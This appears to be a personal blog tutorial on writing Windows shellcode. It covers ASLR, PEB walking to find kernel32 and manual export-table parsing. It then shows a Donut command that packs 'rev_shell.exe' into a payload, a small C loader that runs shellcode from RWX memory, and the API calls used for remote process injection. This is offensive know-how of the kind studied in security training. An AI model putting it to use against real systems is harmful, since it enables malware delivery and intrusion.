Shellcode on Windows

<index> / <windows-internals> / shellcode

[ en | fr ]

┌───────────────────────┐
│                       │
│                       │
│                       │
│                       │
│                       │
│                       │
│                       │
│                       │
│                       │
│                       │
│                       │
│                       │
│                       │
│                       │
│                       │
└───────────────────────┘

Shellcode on Windows
~ lululufr

CONTENTS

  0  the problem — aslr and no fixed addresses
  1  why not use syscalls directly
  2  finding kernel32.dll at runtime
  3  parsing the export directory
  4  donut — pe to shellcode
  5  testing a shellcode

──[ 0. The Problem — ASLR and No Fixed Addresses ]──

A shellcode lands in a memory region whose address is unknown at compile time — 
thanks to ASLR.

ASLR randomises the base addresses of stack, heap, and every loaded module on 
each process launch. Your shellcode can't have hardcoded jumps like JMP 
0x12345678 — they'd crash on the spot.

So the shellcode has to be Position Independent Code (PIC): only relative 
addresses, and resolve everything it needs dynamically at runtime.

──[ 1. Why Not Use Syscalls Directly ]──

On Linux, shellcodes call the kernel directly with the syscall instruction and 
hardcoded numbers. Simple, portable.

On Windows, that doesn't fly:

    - SSNs (Windows Native API syscall numbers) change between OS versions
      (XP → 7 → 10 → 11). A hardcoded SSN for NtAllocateVirtualMemory on
      Windows 10 22H2 isn't the same on Windows 11 23H2.
    - Microsoft doesn't document or guarantee SSN stability.

The right way is to call the documented Win32 API through DLLs:

    kernel32.dll — memory management, process/thread creation, DLL loading
    ntdll.dll    — thin bridge to the kernel (Native API)

──[ 2. Finding kernel32.dll at Runtime ]──

The shellcode needs kernel32.dll's base address so it can grab GetProcAddress, 
then find everything else. The trick uses the PEB and TEB — two structures 
Windows keeps in predictable places.

flowchart TD
    A["FS:[0x30] (x86)\nGS:[0x60] (x64)"] --> B[PEB]
    B --> C[PEB.Ldr]
    C --> D[InMemoryOrderModuleList]
    D --> E["[0] — executable itself"]
    E --> F["[1] — ntdll.dll"]
    F --> G["[2] — kernel32.dll ← base address here"]

Steps:

    1. Read the TEB address from FS (x86) or GS (x64).
    2. TEB contains a pointer to the PEB at a known offset.
    3. PEB.Ldr points to PEB_LDR_DATA which holds InMemoryOrderModuleList.
    4. Walk the list: entry 0 is the exe, entry 1 is ntdll.dll, entry 2
       is kernel32.dll. DllBase on that entry is the base address.

This load order is stable for standard Windows processes.

──[ 3. Parsing the Export Directory ]──

With kernel32.dll located, the shellcode has to find GetProcAddress inside it. 
That means parsing the PE export table by hand.

    1. At offset 0x3C from DLL base: e_lfanew — offset to NT Headers.
    2. NT Headers → Optional Header → DataDirectory[0]: Export Directory RVA.
    3. IMAGE_EXPORT_DIRECTORY holds three parallel arrays:

        AddressOfNames        — RVAs of function name strings
        AddressOfNameOrdinals — index into AddressOfFunctions for each name
        AddressOfFunctions    — RVAs of the actual function code

    4. Loop over AddressOfNames, compare each with "GetProcAddress". When
       you find it, use the corresponding ordinal to index AddressOfFunctions,
       get the RVA, add the DLL base for the VA.

Once you have GetProcAddress, it resolves anything else by name from any loaded 
DLL.

──[ 4. Donut — PE to Shellcode ]──

Writing the PEB-walking and export-parsing stubs by hand in assembly is tedious. 
The open-source tool Donut (github.com/TheWover/donut) does the whole thing: 
feed it any PE (EXE or DLL), it wraps it in a position-independent shellcode 
loader.

    ./donut.exe -i "rev_shell.exe" -a 3 -f 3 -o payload.c

-i input file (PE)

    -a 3 architecture: x64
    -f 3 output format: C array

Donut embeds the PE, compresses it, handles relocation, resolves imports at 
runtime, and calls the entry point — all in a self-contained shellcode blob.

──[ 5. Testing a Shellcode ]──

Minimal in-process test harness:

    int main() {
        void* mem;

        // Allocate RWX memory
        mem = VirtualAlloc(
            NULL,
            sizeof(buf),
            MEM_COMMIT | MEM_RESERVE,
            PAGE_EXECUTE_READWRITE
        );

        // Copy shellcode
        RtlMoveMemory(mem, buf, sizeof(buf));

        // Execute as a function pointer
        ((void(*)())mem)();

        return 0;
    }

buf[] holds the raw shellcode bytes (e.g. from Donut).

Simple loader: alloc an RWX page, copy bytes, call into it. In a real injection 
scenario you'd do the same in a remote process: VirtualAllocEx + 
WriteProcessMemory + CreateRemoteThread.


ret <windows-internals>